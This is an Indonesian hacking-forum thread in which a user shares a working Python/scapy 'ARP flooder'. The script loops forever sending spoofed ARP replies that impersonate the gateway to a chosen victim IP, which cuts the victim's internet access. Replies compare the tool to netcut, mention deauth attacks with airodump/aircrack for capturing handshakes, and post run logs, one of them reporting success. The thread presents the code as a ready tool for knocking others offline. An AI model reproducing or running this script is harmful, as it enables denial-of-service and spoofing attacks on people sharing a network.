[Share] ARP Flooding ! [python script]
#1
Jadi yg dilakuin script ini adalah mengirim kan pake ARP tanpa henti dalam tempo yang sesingkat-singkatnya !!! hehehhe kayak proklamasi aja !!!

sy udah tes di jaringan wlan[non-MikroTik] n work .. mungkin ada om2 sekalian yg bisa bantu cek di jaringan yg pake MikroTik !!! Tongue

berikut scriptnya :
Code:
#!/usr/bin/env python

from scapy.all import *
from time import sleep
import time
import sys, os, re, commands

def title():
    if os.name == "posix":
        os.system("clear")
    else:
        os.system("cls")
    info = '''
_________________________
\   \______   \__    ___/
|   ||    |  _/ |    |  
|   ||    |   \ |    |  
|___||______  / |____|   ARP FLOODER  
             \/        
                          By RR12
                          Indonesian Backtrack Team
                          http://indonesianbacktrack.or.id

        '''
    for i in info:
        print '\b%s' %(i),
        sys.stdout.flush()
        time.sleep(0.005)
    print "\n"

def arpflood():
    interface = raw_input(">] Input interface :")
    conf.iface= interface

    target = raw_input(">] Input target    :")
    target=target
    
    arp_paket = ARP()
    
    # IP Gateway
    gw = commands.getoutput("ip route list | grep default").split()[2][0:]
    arp_paket.psrc = gw
    
    
    #IP Victim
    arp_paket.pdst = target
    
    #Mac
    mac = commands.getoutput("ifconfig " + interface).split()[4][0:]
    arp_paket.hwsrc = mac
    
    sleep(3)
    print '================================================'
    print "[+] Interface              : " + interface
    print "[+] Gateway's IP Address   : " + gw
    print "[+] Your Mac Address       : " + mac
    print "[+] Victim\'s IP Address    : " + target
    print '================================================'
    sleep(3)
    
    print '''
>] Startting ARP Flooding ...
    '''
    try:
        while 1:
            send(arp_paket, verbose=0)
            sleep(0.5)
    except:
        print '\n>] Process Stopped'
    
    
if __name__ == '__main__':
    title()
    try:
        arpflood()
    except KeyBoardInterrupt:
        print '>] Exit'


ssnya ::

[Image: 2d6iqs.jpg]


moga bisa nambah2 !!! hehehhe .. n ane minta masukan om2 semua !! maklum masih amatiraann !!! :badpc:

#2
klo di flood ARP nya berarti si korban ga bisa terkoneksi ke wifi atau dia ga bisa internetan bro? menarik nih Big Grin

#3
klo gag salah victimya gag bisa internetan !!! Big Grin

#4
hmmmm seperti netcut bukan ya jadinya?
Menarik nih...
Nah, kalau perintah deauth itu gmana ya? *maaf OOT
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#5
kalau deauth kan target putus koneksi bro, biar kita dapet session autentikasi dia pas di airodump untuk kemudian di aircrack cmiiw

makanya ane diatas tanya ini bisa bikin putus koneksi atau client hanya ga bisa internetan Smile

#6
(09-24-2011, 03:03 AM)konspirasi Wrote: kalau deauth kan target putus koneksi bro, biar kita dapet session autentikasi dia pas di airodump untuk kemudian di aircrack cmiiw

makanya ane diatas tanya ini bisa bikin putus koneksi atau client hanya ga bisa internetan Smile

owh ternyata dengan aircrack dsb-nya ya...
hahahaha ane gak ngerti soalnya om Smile

Pas percobaan pertama

Spoiler! :

Code:
>] Input interface :wlan0
>] Input target    :192.168.2.3
================================================
[+] Interface              : wlan0
[+] Gateway's IP Address   : 192.168.2.254
[+] Your Mac Address       : 00:1e:65:84:f9:f6
[+] Victim's IP Address    : 192.168.2.3
================================================

>] Startting ARP Flooding ...
    
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: Mac address to reach destination not found. Using broadcast.
^C
>] Process Stopped

Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#7
coba liat kesini bro http://www.aircrack-ng.org/doku.php?id=aircrack-ng

mudah dipahami dan jelas kok Smile

#8
yuupss keknya tepat kata om Konspirasi yg masalah deauth..
ini hanya membuat user gag bisa konek k internet... mirip netcut hanya dgn metode arp yg brbeda klo net
cut arp poisoning/spoofing klo ini arp flooding...

#9
Percobaan pertama....

Spoiler! :

Code:
>] Input interface :wlan0
>] Input target    :192.168.2.3
================================================
[+] Interface              : wlan0
[+] Gateway's IP Address   : 192.168.2.254
[+] Your Mac Address       : 00:1e:65:84:f9:f6
[+] Victim's IP Address    : 192.168.2.3
================================================

>] Startting ARP Flooding ...
    
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: Mac address to reach destination not found. Using broadcast.
^C
>] Process Stopped


Tapi pas percobaan kedua, berhasilll
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#10
thanks om dah di cobain... hehehe






Users browsing this thread: 1 Guest(s)